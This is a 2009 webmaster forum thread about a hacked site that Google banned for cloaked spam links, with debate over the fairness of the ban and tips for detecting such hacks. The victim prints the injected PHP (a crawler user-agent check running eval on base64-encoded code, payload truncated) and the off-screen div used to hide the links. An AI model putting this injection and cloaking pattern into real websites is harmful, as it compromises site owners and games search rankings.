homepage Welcome to WebmasterWorld Guest from 54.242.200.172
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Subscribe to WebmasterWorld
Home / Forums Index / Google / Google SEO News and Discussion
Forum Library, Charter, Moderators: Robert Charlton & aakk9999 & brotherhood of lan & goodroi

Google SEO News and Discussion Forum

This 50 message thread spans 2 pages: 50 ( [1] 2 > >     
30 day ban for cloaked outgoing links due to PHP hack
Lord Majestic




msg:3823011
 7:49 pm on Jan 9, 2009 (gmt 0)

This is heads up for people - just had my old site completely removed from Google index, message in WMC said that cloaked hidden links were found on homepage.

Checked PHP files and could not find those links (you need to use Googlebot useragent), but after careful investigation it was determined that clever PHP injection was made into one of the files included from index.php with datestamp kept intact.

Here is the PHP:

if(strstr($_SERVER['HTTP_USER_AGENT'], 'Mybot') ¦¦ strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot') ¦¦ strstr($_SERVER['HTTP_USER_AGENT'], 'msn')¦¦ strstr($_SERVER['HTTP_USER_AGENT'], 'Slurp')) {
eval(base64_decode('ZnVuY3Rpb24...QoKTsK'));
}

If decoded it shows up that the spam links are taken from external URL that I won't post here (you can decode).

Now what's really odd is that Google just banned whole site because of these clearly hacked links - it seems rather harsh reaction given that they are well aware that such hacks are common place now, it seems more reasonable more would have been to warn user and devalue outgoing links.

[edited by: tedster at 7:56 pm (utc) on Jan. 9, 2009]
[edit reason] obscure the spammer link code [/edit]

 

tedster




msg:3823015
 7:59 pm on Jan 9, 2009 (gmt 0)

Because the server is hacked, there's a much higher possibility of malware being served at any time. That's why hacked sites get smacked so hard - Google is protecting their end users.

with datestamp kept intact

An added level of deviousness I hadn't focused on before. Thanks for that report, it's good to know. We've got a thread with a lot more information about server hacks here: [webmasterworld.com...]

[edited by: tedster at 8:05 pm (utc) on Jan. 9, 2009]

Lord Majestic




msg:3823018
 8:03 pm on Jan 9, 2009 (gmt 0)

Just to add up a few more details:

Spam links are taken from external webservers (most likely also hacked) - trying to look for them or anchor text quoted by Google in WMC message won't give results as it's not in your PHP files.

HTML blob that is used by this spam hack is hidden using this style text (hope it's okay to post here)

<div style="left: -2321px; position: absolute; top: -3454px">

Also as the code shows up it is cloaked so you won't see it unless you use Googlebot :(

All hacked outgoing links were belonging to .EDU domains (most likely hacked) - I wonder if Google bans those!

-----

I've had hacks before (datestamps usually given them away quickly, but not this time) however what suprised me today is not the fact that the hack was pretty clever, but the fact that Google banned established site out of the blue - so, now there is a new way of dealing with competitors: hack server to put up some bad outgoing links like this and one gets banned. :o

Reinclusion request with detailed explanation fired up to Google, will see what it results in.

[edited by: Lord_Majestic at 8:04 pm (utc) on Jan. 9, 2009]

tedster




msg:3823020
 8:08 pm on Jan 9, 2009 (gmt 0)

If you've fixed the security hole that allowed the hack, include that information in your reconsideration request. That's important for a speedy recovery of your site. If you don't fixed the security hole itslef but only remove the cloaked links, you can have a long wait.

Lord Majestic




msg:3823021
 8:09 pm on Jan 9, 2009 (gmt 0)

Because the server is hacked, there's a much higher possibility of malware being served at any time.

Sorry for posting again, but I think it's not at play here:

a) links were cloaked so regular user won't find them
b) links were hidden from user with fancy style tag
c) links were pointing out to .EDU sites with known spammy words starting with V/C etc.

So, I think here Google did not like the fact of gaming the PageRank algorithm rather than malware issue - they did not detect any malware on my site, this is purely link spam thing that now seems to be able to take site out of index pretty quickly.

Lord Majestic




msg:3823022
 8:10 pm on Jan 9, 2009 (gmt 0)

If you've fixed the security hole that allowed the hack

Well, this is not the info that hackers left - I have no clue how they got in, but I am moving my hosting to new much more secure (not shared) location. I included details of the hack to show that we had nothing to do with it as all such links are hosted elsewhere. I hope this will be enough for unban. :(

Not sure if it's worth telling Google this in another reconsideration request, I presume now I just need to move site to better location and wait for unban, hopefully it appears in 30 days max.

[edited by: Lord_Majestic at 8:14 pm (utc) on Jan. 9, 2009]

Lord Majestic




msg:3825266
 1:10 pm on Jan 13, 2009 (gmt 0)

Just to finish this off - today my site was unbanned, pretty quick turn around considering it took maybe 1-2 business days. I am going to move it to more secure (not shared) hosting that hopefully will avoid this stuff in the future, also auto monitoring of file changes seems to be in order too.

tedster




msg:3825414
 4:28 pm on Jan 13, 2009 (gmt 0)

Thanks for the update - that is the outcome I expected and I'm happy it worked out for you.

Lord Majestic




msg:3825592
 8:04 pm on Jan 13, 2009 (gmt 0)

Thanks for good words, I am sure glad it worked (even though most of traffic comes from direct links rather than SEs).

There is still a bit of a bitter taste after all this: don't want to turn this thread into Google bashing but I think things like this will play part in their undoing.

The people who do this sort of hacking stuff should certainly be punished but so far it seems it is the people who had nothing to do with it get hit :(

[edited by: Lord_Majestic at 8:05 pm (utc) on Jan. 13, 2009]

tedster




msg:3825617
 8:23 pm on Jan 13, 2009 (gmt 0)

I see this issue quite differently. If Google didn't take hacked pages out the SERPs, then the general population would be up in arms because of the problems they get from clicking on Google links. It's their website, and they are only being responsible by not linking to pages that might cause problems for their users.

If I find an external link on a client site that points to a hacked page, I tell the client to get rid of the link - and it usually takes a lot longer than a few days for that link to be replaced.

This is the unfortunate result of the "pirate" mentality that infects the web. We should direct our anger at the hackers on this one, not Google. I also get bothered by the aura of "glamor" that some people give to this kind of hacking. It's destructive behavior, plain old, and it's not something to mythologize.

So yes, sometimes the victim suffers. That's what the word "victim" is all about.

travelin cat




msg:3827595
 4:52 am on Jan 16, 2009 (gmt 0)

Checked PHP files and could not find those links (you need to use Googlebot useragent),

Could you please explain how to do this for us less savvy people?

SEOPTI




msg:3827607
 5:13 am on Jan 16, 2009 (gmt 0)

The Firefox "user agent switcher" addon will do the job, you can surf your site as Googlebot or whatever you want.

koan




msg:3827631
 6:14 am on Jan 16, 2009 (gmt 0)

don't want to turn this thread into Google bashing but I think things like this will play part in their undoing

It seems Google did everything right. Banning your site got your full attention. How is Google supposed to know if you are being hacked or if it's deliberate? It's not for them to decide, your web site is your responsibility. Then when you fixed it up and asked for reconsideration, they unbanned you in just a few days. Seems to me Google was very effective and beyond reproach. With the millions of sites out there, I understand how they look for their interest and their users interest first. Google is no nanny.

JS_Harris




msg:3827707
 9:39 am on Jan 16, 2009 (gmt 0)

A site showed signs of something not being right, it got removed from Google quickly. To me that says everything is working as it should, there is no reason to potty mouth Google. I second Koan's statement above.

Now the real question is, how do we catch the hacker responsible? Plugging holes doesn't seem like it's enough of a deterrent, I'd love to see a trap placed over it instead. Let the hacker get swamped with spam for a change.

Chico_Loco




msg:3827871
 3:08 pm on Jan 16, 2009 (gmt 0)

Just an FYI... you might want to set up a checksum reference type check. That way, the checksum for the files will differ regardless of last modified date. Get a differing checksum and you know the file has changed!

Doesn't work as easy if files are being auto-modified however.

kapow




msg:3828047
 7:38 pm on Jan 16, 2009 (gmt 0)

This sort of thing is reaching plague proportions in the last 2-3 years. I am trying to put together a list of checks, e.g.
- Form Hacks: Escape and filter in the form script.
- Server Hacks: Host reputation.
- Common 3rd party Ap hacks: e.g. Older versions of WordPress...

But I'm not a programmer, so I'm a bit in the dark. The webmaster community really needs a guide on hack prevention.

Erku




msg:3828474
 4:31 pm on Jan 17, 2009 (gmt 0)

If I want to check if my website is having or not a similar problem.

How can I check for this problem? Do I ask the host to check? Or is there a way I can check?

Thank you.

Lord Majestic




msg:3828478
 4:47 pm on Jan 17, 2009 (gmt 0)

If Google didn't take hacked pages out the SERPs, then the general population would be up in arms because of the problems they get from clicking on Google links

There are 2 types of hacked links:
1) malware - designed for user to see them and infect their machine
2) rank boosting - invisible to users but visible to Google crawlers

My case is #2 - users were in no danger because they would never see those links - the intention of the hacker was to only influence Google ranking and Google knew that, yet they banned whole site from index - not just the hacked page. I think this is well overboard and only monopoly can afford to do such things - it's just a matter of time before they get sued and lose it.

I didn't suffer from hackers actually - they did good job to hide their actions, my users did not suffer either - they never saw such links as they were cloaked , only Google in this case "suffered", they detected such links and should have devalued them, not ban whole site out of the blue.

Lord Majestic




msg:3828480
 4:51 pm on Jan 17, 2009 (gmt 0)

Could you please explain how to do this for us less savvy people?

The hackers changed PHP file that was included from main index.php (so harder to find it was changed), kept old datestamp and also they did not put links directly into code - instead they had PHP code (encoded) to pull those links from a few external sites that were hosting them.

This meant that when I first searched for such alleged (by Google) links in my PHP files I could not find anything.

As the result I am now moving to more secure location (not shared hosting).

Google's behavior however is not acceptable in my view - banning whole site simply because some hidden links appeared is way too harsh, they know lots of sites get hacked yet they choose to ban them so quickly.

It seems to me this allows to create an easy black hat strategy - hack competitor site to place such hidden links and they get removed from index completely, that's crazy stuff IMO.

tedster




msg:3828583
 8:52 pm on Jan 17, 2009 (gmt 0)

they detected such links and should have devalued them, not ban whole site out of the blue.

I still see it differently. If your site is open to that hacker, they can switch to something more malicious at any time, or even for any user agent. Sorry to disagree, but as an end user I want to Google to keep hacked websites out of their search results, whether the hack is "harmless" at the moment or not.

And take it one step further - cloaked links, whether hacked or not, are a violation of Google's guidelines.

I appreciate that a hack and ranking problem feels like a terrible violation - as indeed it is. But Google is not the villain here, the hacker is.

Lord Majestic




msg:3828627
 9:47 pm on Jan 17, 2009 (gmt 0)

If your site is open to that hacker, they can switch to something more malicious at any time

I don't want to turn this thread into Google bashing but I disagree completely.

tedster




msg:3828652
 11:05 pm on Jan 17, 2009 (gmt 0)

Then let's agree to disagree about the hacking.

How about the fact that your website was cloaking? Google has always reserved the right to remove a website for cloaking. I'd say you were fortunate to get a rapid recovery so quickly after the cloaking stopped.

reaxion




msg:3828672
 12:10 am on Jan 18, 2009 (gmt 0)

If this happened and you were to check the cache of the page in google would such devious links that have been injected on the site show up in the cache? From my understanding they would show up as the cached page is equal to that of what google analyzes and interprets. Please let me know if I'm off here?

Erku




msg:3828680
 1:18 am on Jan 18, 2009 (gmt 0)

Can anyone please exaplin how to check your site for this type of hacking?

Any online tools? Any specific way?

tedster




msg:3828683
 1:28 am on Jan 18, 2009 (gmt 0)

Yes, Google's cache would show the cloaked links - if the hacker hasn't also included a no-cache meta tag in their hack.

The best discovery tool for the website owner is to browse their own website using a googlebot user-agent, which is easily done with a Firefox add-on called "User Agent Switcher". But even better than discovering a hack after it already happened is preventing it. Keep your web server secure by installing the most recent updates for your software as soon as they become available. Pay particular attention to widely used applications such as blogging software, content management systems and off-the-shelf forum software.

Also note that this thread discusses only one of the MANY possible hacks that are on the rise and can hurt you in Google. For a more complete discussion, see this thread: How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]. It's listed in the Hot Topics area [webmasterworld.com], which is always pinned to the top of this forum's index page.

pontifex




msg:3828819
 10:08 am on Jan 18, 2009 (gmt 0)

Can anyone please exaplin how to check your site for this type of hacking?

I strongly recommend lynx, the command line browser. There is a Windows/DOS port of it available and the tool shows you the text and links in a nice list.

On Linux (or Unix) you can automate the call of certain URLs and mail yourself the output. For the Linux guys out there:

lynx -dump http://www.yourowndomain.tld/ ¦grep http: ¦grep -v yourowndomain

filters the outgoing links from your homepage on yourowndomain and puts them in a nice list.

with a daily cron job and some mails to yourself you may just feel a bit better with your links controlled that way!

P!

[edited by: tedster at 8:38 pm (utc) on Jan. 18, 2009]
[edit reason] de-link the example url [/edit]

Lord Majestic




msg:3828846
 11:33 am on Jan 18, 2009 (gmt 0)

How about the fact that your website was cloaking?

My site was hacked - the code injected by the attacker shown a few links in a hidden style layer.

It is too harsh in my view to ban site that was in existance for a very long time only because suddenly a few links appeared on homepage - they were cloaked (that's why I did not see them), sure, but banning on sight when Google perfectly knows that lots of such hacks going around is totally wrong.

What Google should have done is:
a) devalue such links
b) send message to site owner warning about possible ban

Let me repeat this - Google knows perfectly well that lots of sites now get hacked en masse, we will never have perfect security - they are placing unreasonable burden upon shoulders of people who might not even know they were banned - just how many sites disappered from Google index only because they were small and their owners away on vacation?

Hackers are evil people, but Google is now making things REALLY bad - if my car is stolen by thieves then it's bad enough, however if I lose my driving license because of that then it's totally wrong and does not happen in real world - Google will get slapped for their actions that are in my view abuse of their monopoly.

Robert Charlton




msg:3829011
 7:30 pm on Jan 18, 2009 (gmt 0)

Google knows perfectly well that lots of sites now get hacked en masse...

Yes, that's precisely the point. I'd look upon Google's reaction as a prudent measure to help prevent further spread of the problem.

Think of it as an automated quarantine or isolation measure to control the spread of a highly contagious and dangerous disease, likely to spread if not contained.

In a public health situation, those unfortunate enough to have come down with, or even to have been exposed to, a disease considered to be sufficiently threatening may not be at fault. Nevertheless, their rights to travel or mingle among the public may be restricted.

[edited by: Robert_Charlton at 7:30 pm (utc) on Jan. 18, 2009]

trillianjedi




msg:3829047
 8:30 pm on Jan 18, 2009 (gmt 0)

Pontifex - that's a great lynx tip, thanks. Just installed lynx on an old box and tried it.

Slick!

Lord Majestic




msg:3829050
 8:48 pm on Jan 18, 2009 (gmt 0)

Yes, that's precisely the point. I'd look upon Google's reaction as a prudent measure to help prevent further spread of the problem.

What problem exactly are they solving? We are not talking here malicious links to viruses or some exploit that can infect users - they are not preventing anything by banning sites like mine who were hacked (this happens all the time and will happen) with cloaked hidden links that were designed to boost ranking of some sites (pointing to .EDU sites in my case - I wonder if Google banned those?!).

It has nothing to do with public health - don't confuse situation that I described with that of compromised web pages that serve viruses, that was not the case and Google knew it because they only saw such links when Googlebot visited the page as they were cloaked.

This attitude will end them in court sooner rather than later and they will lose.

This 50 message thread spans 2 pages: 50 ( [1] 2 > >
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Google / Google SEO News and Discussion
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
© Webmaster World 1996-2014 all rights reserved